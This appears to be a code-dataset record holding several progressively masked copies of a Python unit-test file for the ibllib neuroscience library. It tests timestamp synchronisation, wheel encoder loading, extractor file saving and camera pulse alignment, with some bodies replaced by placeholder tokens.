self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 
'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots 
import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, 
t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = 
audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n 
t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n 
pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = 
sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] 
== audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n 